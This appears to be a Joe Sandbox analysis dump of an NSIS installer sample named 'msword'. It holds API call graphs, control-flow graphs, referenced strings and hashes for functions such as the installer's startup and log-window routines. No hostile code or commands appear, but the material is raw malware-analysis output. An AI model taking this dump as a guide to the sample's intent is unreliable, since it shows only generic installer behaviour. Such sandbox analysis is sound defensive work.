3616->3615 3617->3614 3621 404ff5 lstrcatW 3617->3621 3619 405011 3618->3619 3620 405004 SetWindowTextW 3618->3620 3619->3614 3622 405017 SendMessageW SendMessageW SendMessageW 3619->3622 3620->3619 3621->3618 3622->3614 3623->3599 3625 4018a5 3624->3625 3626 406317 FindClose 3624->3626 3625->3564 3625->3565 3626->3625 3634 406328 GetModuleHandleA 3627->3634 3631 401936 3631->3605 3632->3546 3633->3524 3635 406340 LoadLibraryA 3634->3635 3636 40634b GetProcAddress 3634->3636 3635->3636 3637 406359 3635->3637 3636->3637 3637->3631 3638 406ac5 lstrcpyW 3637->3638 3639 406b13 GetShortPathNameW 3638->3639 3640 406aea 3638->3640 3642 406b2c 3639->3642 3643 406c8e 3639->3643 3664 405e7c GetFileAttributesW CreateFileW 3640->3664 3642->3643 3645 406b34 WideCharToMultiByte 3642->3645 3643->3631 3644 406af3 CloseHandle GetShortPathNameW 3644->3643 3646 406b0b 3644->3646 3645->3643 3647 406b51 WideCharToMultiByte 3645->3647 3646->3639 3646->3643 3647->3643 3648 406b69 wsprintfA 3647->3648 3649 406831 18 API calls 3648->3649 3650 406b95 3649->3650 3665 405e7c GetFileAttributesW CreateFileW 3650->3665 3652 406ba2 3652->3643 3653 406baf GetFileSize GlobalAlloc 3652->3653 3654 406bd0 ReadFile 3653->3654 3655 406c84 CloseHandle 3653->3655 3654->3655 3656 406bea 3654->3656 3655->3643 3656->3655 3666 405de2 lstrlenA 3656->3666 3659 406c03 lstrcpyA 3662 406c25 3659->3662 3660 406c17 3661 405de2 4 API calls 3660->3661 3661->3662 3663 406c5c SetFilePointer WriteFile GlobalFree 3662->3663 3663->3655 3664->3644 3665->3652 3667 405e23 lstrlenA 3666->3667 3668 405e2b 3667->3668 3669 405dfc lstrcmpiA 3667->3669 3668->3659 3668->3660 3669->3668 3670 405e1a CharNextA 3669->3670 3670->3667 4856 402da5 4857 4030e3 4856->4857 4858 402dac 4856->4858 4859 401446 18 API calls 4858->4859 4860 402db8 4859->4860 4861 402dbf SetFilePointer 4860->4861 4861->4857 4862 402dcf 4861->4862 4862->4857 4864 405f7d wsprintfW 4862->4864 4864->4857 4865 4049a8 GetDlgItem GetDlgItem 4866 4049fe 7 API calls 4865->4866 4871 404c16 4865->4871 4867 404aa2 DeleteObject 4866->4867 4868 404a96 SendMessageW 4866->4868 4869 404aad 4867->4869 4868->4867 4872 404ae4 4869->4872 4874 406831 18 API calls 4869->4874 4870 404cfb 4873 404da0 4870->4873 4878 404c09 4870->4878 4883 404d4a SendMessageW 4870->4883 4871->4870 4881 40487a 5 API calls 4871->4881 4897 404c86 4871->4897 4877 403d6b 19 API calls 4872->4877 4875 404db5 4873->4875 4876 404da9 SendMessageW 4873->4876 4880 404ac6 SendMessageW SendMessageW 4874->4880 4885 404dc7 ImageList_Destroy 4875->4885 4886 404dce 4875->4886 4894 404dde 4875->4894 4876->4875 4882 404af8 4877->4882 4884 403df6 8 API calls 4878->4884 4879 404ced SendMessageW 4879->4870 4880->4869 4881->4897 4887 403d6b 19 API calls 4882->4887 4883->4878 4889 404d5f SendMessageW 4883->4889 4890 404f97 4884->4890 4885->4886 4891 404dd7 GlobalFree 4886->4891 4886->4894 4900 404b09 4887->4900 4888 404f48 4888->4878 4895 404f5d ShowWindow GetDlgItem ShowWindow 4888->4895 4892 404d72 4889->4892 4891->4894 4902 404d83 SendMessageW 4892->4902 4893 404bd6 GetWindowLongW SetWindowLongW 4896 404bf0 4893->4896 4894->4888 4901 40141d 80 API calls 4894->4901 4911 404e10 4894->4911 4895->4878 4898 404bf6 ShowWindow 4896->4898 4899 404c0e 4896->4899 4897->4870 4897->4879 4916 403dc4 SendMessageW 4898->4916 4917 403dc4 SendMessageW 4899->4917 4900->4893 4903 404bd0 4900->4903 4906 404b65 SendMessageW 4900->4906 4907 404b93 SendMessageW 4900->4907 4908 404ba7 SendMessageW 4900->4908 4901->4911 4902->4873 4903->4893 4903->4896 4906->4900 4907->4900 4908->4900 4909 404f1f InvalidateRect 4909->4888 4910 404f35 4909->4910 4913 4043d9 21 API calls 4910->4913 4912 404e3e SendMessageW 4911->4912 4915 404e54 4911->4915 4912->4915 4913->4888 4914 404ecd SendMessageW SendMessageW 4914->4915 4915->4909 4915->4914 4916->4878 4917->4871 4918 4030a9 SendMessageW 4919 4030c2 InvalidateRect 4918->4919 4920 4030e3 4918->4920 4919->4920 3871 4038af #17 SetErrorMode OleInitialize 3872 406328 3 API calls 3871->3872 3873 4038f2 SHGetFileInfoW 3872->3873 3945 406035 lstrcpynW 3873->3945 3875 40391d GetCommandLineW 3946 406035 lstrcpynW 3875->3946 3877 40392f GetModuleHandleW 3878 403947 3877->3878 3879 405d32 CharNextW 3878->3879 3880 403956 CharNextW 3879->3880 3894 403968 3880->3894 3881 403a02 3882 403a21 GetTempPathW 3881->3882 3947 4037f8 3882->3947 3884 403a37 3885 403a3b GetWindowsDirectoryW lstrcatW 3884->3885 3886 403a5f DeleteFileW 3884->3886 3888 4037f8 11 API calls 3885->3888 3955 4035b3 GetTickCount GetModuleFileNameW 3886->3955 3887 405d32 CharNextW 3887->3894 3890 403a57 3888->3890 3890->3886 3892 403af8 3890->3892 3891 403a73 3891->3892 3896 405d32 CharNextW 3891->3896 3932 403add 3891->3932 4040 403885 3892->4040 3894->3881 3894->3887 3900 403a04 3894->3900 3907 403a8a 3896->3907 3898 403bfa 3903 403c7d 3898->3903 3905 406328 3 API calls 3898->3905 3899 403b0d 3904 405ccc MessageBoxIndirectW 3899->3904 4047 406035 lstrcpynW 3900->4047 3901 403aed 3902 406113 9 API calls 3901->3902 3902->3892 3906 403b1b ExitProcess 3904->3906 3909 403c09 3905->3909 3910 403b23 lstrcatW lstrcmpiW 3907->3910 3911 403ab5 3907->3911 3912 406328 3 API calls 3909->3912 3910->3892 3914 403b3f CreateDirectoryW SetCurrentDirectoryW 3910->3914 4048 4067aa 3911->4048 3915 403c12 3912->3915 3917 403b62 3914->3917 3918 403b57 3914->3918 3919 406328 3 API calls 3915->3919 4065 406035 lstrcpynW 3917->4065 4064 406035 lstrcpynW 3918->4064 3924 403c1b 3919->3924 3923 403b70 4066 406035 lstrcpynW 3923->4066 3925 403c69 ExitWindowsEx 3924->3925 3931 403c29 GetCurrentProcess 3924->3931 3925->3903 3928 403c76 3925->3928 3926 403ad2 4063 406035 lstrcpynW 3926->4063 3930 40141d 80 API calls 3928->3930 3930->3903 3935 403c39 3931->3935 3983 405958 3932->3983 3933 406831 18 API calls 3934 403b98 DeleteFileW 3933->3934 3936 403ba5 CopyFileW 3934->3936 3942 403b7f 3934->3942 3935->3925 3936->3942 3937 403bee 3939 406c94 42 API calls 3937->3939 3938 406c94 42 API calls 3938->3942 3940 403bf5 3939->3940 3940->3892 3941 406831 18 API calls 3941->3942 3942->3933 3942->3937 3942->3938 3942->3941 3944 403bd9 CloseHandle 3942->3944 4067 405c6b CreateProcessW 3942->4067 3944->3942 3945->3875 3946->3877 3948 406064 5 API calls 3947->3948 3949 403804 3948->3949 3950 40380e 3949->3950 3951 40674e 3 API calls 3949->3951 3950->3884 3952 403816 CreateDirectoryW 3951->3952 3953 405eab 2 API calls 3952->3953 3954 40382a 3953->3954 3954->3884 4070 405e7c GetFileAttributesW CreateFileW 3955->4070 3957 4035f3 3977 403603 3957->3977 4071 406035 lstrcpynW 3957->4071 3959 403619 4072 40677d lstrlenW 3959->4072 3963 40362a GetFileSize 3964 403726 3963->3964 3976 403641 3963->3976 4077 4032d2 3964->4077 3966 40372f 3968 40376b GlobalAlloc 3966->3968 3966->3977 4089 403368 SetFilePointer 3966->4089 3967 403336 ReadFile 3967->3976 4088 403368 SetFilePointer 3968->4088 3970 4037e9 3973 4032d2 6 API calls 3970->3973 3972 40374c 3975 403336 ReadFile 3972->3975 3973->3977 3974 403786 3978 40337f 33 API calls 3974->3978 3979 403757 3975->3979 3976->3964 3976->3967 3976->3970 3976->3977 3980 4032d2 6 API calls 3976->3980 3977->3891 3981 403792 3978->3981 3979->3968 3979->3977 3980->3976 3981->3977 3981->3981 3982 4037c0 SetFilePointer 3981->3982 3982->3977 3984 406328 3 API calls 3983->3984 3985 40596c 3984->3985 3986 405972 3985->3986 3987 405984 3985->3987 4103 405f7d wsprintfW 3986->4103 3988 405eff 3 API calls 3987->3988 3989 4059b5 3988->3989 3991 4059d4 lstrcatW 3989->3991 3993 405eff 3 API calls 3989->3993 3992 405982 3991->3992 4094 403ec1 3992->4094 3993->3991 3996 4067aa 18 API calls 3997 405a06 3996->3997 3998 405a9c 3997->3998 4000 405eff 3 API calls 3997->4000 3999 4067aa 18 API calls 3998->3999 4001 405aa2 3999->4001 4002 405a38 4000->4002 4003 405ab2 4001->4003 4004 406831 18 API calls 4001->4004 4002->3998 4006 405a5b lstrlenW 4002->4006 4010 405d32 CharNextW 4002->4010 4005 405ad2 LoadImageW 4003->4005 4105 403ea0 4003->4105 4004->4003 4007 405b92 4005->4007 4008 405afd RegisterClassW 4005->4008 4011 405a69 lstrcmpiW 4006->4011 4012 405a8f 4006->4012 4009 40141d 80 API calls 4007->4009 4014 405b9c 4008->4014 4015 405b45 SystemParametersInfoW CreateWindowExW 4008->4015 4017 405b98 4009->4017 4018 405a56 4010->4018 4011->4012 4019 405a79 GetFileAttributesW 4011->4019 4016 40674e 3 API calls 4012->4016 4014->3901 4015->4007 4021 405a95 4016->4021 4017->4014 4024 403ec1 19 API calls 4017->4024 4018->4006 4022 405a85 4019->4022 4020 405ac8 4020->4005 4104 406035 lstrcpynW 4021->4104 4022->4012 4025 40677d 2 API calls 4022->4025 4026 405ba9 4024->4026 4025->4012 4027 405bb5 ShowWindow LoadLibraryW 4026->4027 4028 405c38 4026->4028 4030 405bd4 LoadLibraryW 4027->4030 4031 405bdb GetClassInfoW 4027->4031 4029 405073 83 API calls 4028->4029 4032 405c3e 4029->4032 4030->4031 4033 405c05 DialogBoxParamW 4031->4033 4034 405bef GetClassInfoW RegisterClassW 4031->4034 4035 405c42 4032->4035 4036 405c5a 4032->4036 4037 40141d 80 API calls 4033->4037 4034->4033 4035->4014 4039 40141d 80 API calls 4035->4039 4038 40141d 80 API calls 4036->4038 4037->4014 4038->4014 4039->4014 4041 40389d 4040->4041 4042 40388f CloseHandle 4040->4042 4112 403caf 4041->4112 4042->4041 4047->3882 4165 406035 lstrcpynW 4048->4165 4050 4067bb 4051 405d85 4 API calls 4050->4051 4052 4067c1 4051->4052 4053 406064 5 API calls 4052->4053 4060 403ac3 4052->4060 4059 4067d1 4053->4059 4054 406809 lstrlenW 4055 406810 4054->4055 4054->4059 4056 40674e 3 API calls 4055->4056 4058 406816 GetFileAttributesW 4056->4058 4057 406301 2 API calls 4057->4059 4058->4060 4059->4054 4059->4057 4059->4060 4061 40677d 2 API calls 4059->4061 4060->3892 4062 406035 lstrcpynW 4060->4062 4061->4054 4062->3926 4063->3932 4064->3917 4065->3923 4066->3942 4068 405ca6 4067->4068 4069 405c9a CloseHandle 4067->4069 4068->3942 4069->4068 4070->3957 4071->3959 4073 40678c 4072->4073 4074 406792 CharPrevW 4073->4074 4075 40361f 4073->4075 4074->4073 4074->4075 4076 406035 lstrcpynW 4075->4076 4076->3963 4078 4032f3 4077->4078 4079 4032db 4077->4079 4082 403303 GetTickCount 4078->4082 4083 4032fb 4078->4083 4080 4032e4 DestroyWindow 4079->4080 4081 4032eb 4079->4081 4080->4081 4081->3966 4084 403311 CreateDialogParamW ShowWindow 4082->4084 4085 403334 4082->4085 4090 40635e 4083->4090 4084->4085 4085->3966 4088->3974 4089->3972 4091 40637b PeekMessageW 4090->4091 4092 406371 DispatchMessageW 4091->4092 4093 403301 4091->4093 4092->4091 4093->3966 4095 403ed5 4094->4095 4110 405f7d wsprintfW 4095->4110 4097 403f49 4098 406831 18 API calls 4097->4098 4099 403f55 SetWindowTextW 4098->4099 4100 403f70 4099->4100 4101 403f8b 4100->4101 4102 406831 18 API calls 4100->4102 4101->3996 4102->4100 4103->3992 4104->3998 4111 406035 lstrcpynW 4105->4111 4107 403eb4 4108 40674e 3 API calls 4107->4108 4109 403eba lstrcatW 4108->4109 4109->4020 4110->4097 4111->4107 4113 403cbd 4112->4113 4114 4038a2 4113->4114 4115 403cc2 FreeLibrary GlobalFree 4113->4115 4116 406cc7 4114->4116 4115->4114 4115->4115 4117 4067aa 18 API calls 4116->4117 4118 406cda 4117->4118 4119 406ce3 DeleteFileW 4118->4119 4120 406cfa 4118->4120 4159 4038ae CoUninitialize 4119->4159 4121 406e77 4120->4121 4163 406035 lstrcpynW 4120->4163 4127 406301 2 API calls 4121->4127 4148 406e84 4121->4148 4121->4159 4123 406d25 4124 406d39 4123->4124 4125 406d2f lstrcatW 4123->4125 4128 40677d 2 API calls 4124->4128 4126 406d3f 4125->4126 4130 406d4f lstrcatW 4126->4130 4132 406d57 lstrlenW FindFirstFileW 4126->4132 4129 406e90 4127->4129 4128->4126 4133 40674e 3 API calls 4129->4133 4129->4159 4130->4132 4131 4062cf 11 API calls 4131->4159 4134 406e67 4132->4134 4142 406d7e 4132->4142 4135 406e9a 4133->4135 4134->4121 4137 4062cf 11 API calls 4135->4137 4136 405d32 CharNextW 4136->4142 4138 406ea5 4137->4138 4139 405e5c 2 API calls 4138->4139 4141 406ead RemoveDirectoryW 4139->4141 4145 406ef0 4141->4145 4146 406eb9 4141->4146 4142->4136 4143 406e44 FindNextFileW 4142->4143 4150 4062cf 11 API calls 4142->4150 4152 406cc7 72 API calls 4142->4152 4154 405e5c 2 API calls 4142->4154 4160 404f9e 25 API calls 4142->4160 4161 404f9e 25 API calls 4142->4161 4162 406c94 42 API calls 4142->4162 4164 406035 lstrcpynW 4142->4164 4143->4142 4144 406e5c FindClose 4143->4144 4144->4134 4147 404f9e 25 API calls 4145->4147 4146->4148 4149 406ebf 4146->4149 4147->4159 4148->4131 4151 4062cf 11 API calls 4149->4151 4150->4142 4153 406ec9 4151->4153 4152->4142 4155 404f9e 25 API calls 4153->4155 4157 406dfa DeleteFileW 4154->4157 4156 406ed3 4155->4156 4158 406c94 42 API calls 4156->4158 4157->4142 4158->4159 4159->3898 4159->3899 4160->4143 4161->4142 4162->4142 4163->4123 4164->4142 4165->4050 4921 401cb2 4922 40145c 18 API calls 4921->4922 4923 401c54 4922->4923 4924 401c64 4923->4924 4925 4062cf 11 API calls 4923->4925 4926 401c59 4925->4926 4927 406cc7 81 API calls 4926->4927 4927->4924 3671 4021b5 3672 40145c 18 API calls 3671->3672 3673 4021bb 3672->3673 3674 40145c 18 API calls 3673->3674 3675 4021c4 3674->3675 3676 40145c 18 API calls 3675->3676 3677 4021cd 3676->3677 3678 40145c 18 API calls 3677->3678 3679 4021d6 3678->3679 3680 404f9e 25 API calls 3679->3680 3681 4021e2 ShellExecuteW 3680->3681 3682 40220d 3681->3682 3685 40221b 3681->3685 3683 4062cf 11 API calls 3682->3683 3683->3685 3684 4062cf 11 API calls 3686 402230 3684->3686 3685->3684 4928 402238 4929 40145c 18 API calls 4928->4929 4930 40223e 4929->4930 4931 4062cf 11 API calls 4930->4931 4932 40224b 4931->4932 4933 404f9e 25 API calls 4932->4933 4934 402255 4933->4934 4935 405c6b 2 API calls 4934->4935 4936 40225b 4935->4936 4937 4062cf 11 API calls 4936->4937 4945 4022ac CloseHandle 4936->4945 4942 40226d 4937->4942 4939 4030e3 4940 402283 WaitForSingleObject 4941 402291 GetExitCodeProcess 4940->4941 4940->4942 4944 4022a3 4941->4944 4941->4945 4942->4940 4943 40635e 2 API calls 4942->4943 4942->4945 4943->4940 4947 405f7d wsprintfW 4944->4947 4945->4939 4947->4945 3747 401eb9 3748 401f24 3747->3748 3749 401ec6 3747->3749 3750 401f53 GlobalAlloc 3748->3750 3755 401f28 3748->3755 3751 401ed5 3749->3751 3757 401ef7 3749->3757 3753 406831 18 API calls 3750->3753 3752 4062cf 11 API calls 3751->3752 3765 401ee2 3752->3765 3759 401f46 3753->3759 3754 401f36 3771 406035 lstrcpynW 3754->3771 3755->3754 3756 4062cf 11 API calls 3755->3756 3756->3754 3769 406035 lstrcpynW 3757->3769 3761 402708 3759->3761 3762 402387 GlobalFree 3759->3762 3762->3761 3763 406831 18 API calls 3763->3765 3764 401f06 3770 406035 lstrcpynW 3764->3770 3765->3761 3765->3763 3767 401f15 3772 406035 lstrcpynW 3767->3772 3769->3764 3770->3767 3771->3759 3772->3761 4948 404039 4949 404096 4948->4949 4950 404046 lstrcpynA lstrlenA 4948->4950 4950->4949 4951 404077 4950->4951 4951->4949 4952 404083 GlobalFree 4951->4952 4952->4949

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 4 4052f2-4052ff 1->4 5 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->5 37 405203-40521d SendMessageW * 2 2->37 38 40521f-405222 2->38 7 405320-405327 4->7 8 405301-40530a 4->8 5->4 9 405329-40532f 7->9 10 40537e-405382 7->10 12 405342-40534b call 403df6 8->12 13 40530c-40531b ShowWindow * 2 call 403dc4 8->13 14 405331-40533d call 403d44 9->14 15 405357-405367 ShowWindow 9->15 10->12 18 405384-405387 10->18 21 405350-405354 12->21 13->7 14->12 22 405377-405379 call 403d44 15->22 23 405369-405372 call 404f9e 15->23 18->12 25 405389-40539c SendMessageW 18->25 22->10 23->22 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 25->29 30 4052ba-4052bc 25->30 35 4053c5-4053d6 GetWindowRect 29->35 36 4053d8-4053de 29->36 30->21 39 4053df-4053f7 TrackPopupMenu 35->39 36->39 37->38 40 405232-405249 call 403d6b 38->40 41 405224-405230 SendMessageW 38->41 39->30 42 4053fd-405414 39->42 46 40524b-40525f ShowWindow 40->46 47 40527f-4052a0 GetDlgItem SendMessageW 40->47 41->40 45 405419-405434 SendMessageW 42->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 53 405274-40527a call 403dc4 49->53 50->53 51->30 52->52 54 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->47 54->30
                                          APIs
                                          • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                          • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                          • GetClientRect.USER32(?,?), ref: 004051C2
                                          • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                          • ShowWindow.USER32(?,00000008), ref: 00405266
                                          • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                          • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                            • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004283D1,76F923A0,00000000), ref: 00406902
                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                          • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                          • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                          • ShowWindow.USER32(00000000), ref: 00405313
                                          • ShowWindow.USER32(?,00000008), ref: 00405318
                                          • ShowWindow.USER32(00000008), ref: 0040535F
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                          • CreatePopupMenu.USER32 ref: 004053A2
                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                          • GetWindowRect.USER32(?,?), ref: 004053CA
                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                          • OpenClipboard.USER32(00000000), ref: 00405437
                                          • EmptyClipboard.USER32 ref: 0040543D
                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                          • GlobalLock.KERNEL32(00000000), ref: 00405453
                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                          • CloseClipboard.USER32 ref: 0040549A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                          • String ID: New install of "%s" to "%s"${
                                          • API String ID: 2110491804-1641061399
                                          • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                          • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                          • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                          • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 218 403a21-403a39 GetTempPathW call 4037f8 214->218 216 403970-403976 215->216 217 403978-40397c 215->217 216->216 216->217 220 403984-403988 217->220 221 40397e-403983 217->221 225 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 218->225 226 403a5f-403a79 DeleteFileW call 4035b3 218->226 223 4039e4-4039f1 call 405d32 220->223 224 40398a-403991 220->224 221->220 223->213 239 4039f3 223->239 228 403993-40399a 224->228 229 4039a6-4039b8 call 40382c 224->229 225->226 242 403af8-403b07 call 403885 CoUninitialize 225->242 226->242 243 403a7b-403a81 226->243 234 4039a1 228->234 235 40399c-40399f 228->235 240 4039ba-4039c1 229->240 241 4039cd-4039e2 call 40382c 229->241 234->229 235->229 235->234 239->213 245 4039c3-4039c6 240->245 246 4039c8 240->246 241->223 256 403a04-403a1c call 40824c call 406035 241->256 254 403bfa-403c00 242->254 255 403b0d-403b1d call 405ccc ExitProcess 242->255 248 403ae1-403ae8 call 405958 243->248 249 403a83-403a8c call 405d32 243->249 245->241 245->246 246->241 258 403aed-403af3 call 406113 248->258 264 403aa5-403aa7 249->264 260 403c02-403c1f call 406328 * 3 254->260 261 403c7d-403c85 254->261 256->218 258->242 293 403c21-403c23 260->293 294 403c69-403c74 ExitWindowsEx 260->294 269 403c87 261->269 270 403c8b 261->270 267 403aa9-403ab3 264->267 268 403a8e-403aa0 call 40382c 264->268 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 281 403aa2 268->281 269->270 275->242 280 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->280 276->242 287 403ac7-403add call 406035 * 2 276->287 284 403b62-403b82 call 406035 * 2 280->284 285 403b57-403b5d call 406035 280->285 281->264 301 403b87-403ba3 call 406831 DeleteFileW 284->301 285->284 287->248 293->294 298 403c25-403c27 293->298 294->261 297 403c76-403c78 call 40141d 294->297 297->261 298->294 303 403c29-403c3b GetCurrentProcess 298->303 308 403be4-403bec 301->308 309 403ba5-403bb5 CopyFileW 301->309 303->294 310 403c3d-403c5f 303->310 308->301 312 403bee-403bf5 call 406c94 308->312 309->308 311 403bb7-403bd7 call 406c94 call 406831 call 405c6b 309->311 310->294 311->308 322 403bd9-403be0 CloseHandle 311->322 312->242 322->308
                                          APIs
                                          • #17.COMCTL32 ref: 004038CE
                                          • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                          • OleInitialize.OLE32(00000000), ref: 004038E0
                                            • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                            • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                            • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                          • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                          • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                          • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                          • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                          • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                          • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                          • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                          • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                          • CoUninitialize.COMBASE(?), ref: 00403AFD
                                          • ExitProcess.KERNEL32 ref: 00403B1D
                                          • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                          • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                          • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                          • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                          • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                          • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                          • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                          • API String ID: 2435955865-3712954417
                                          • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
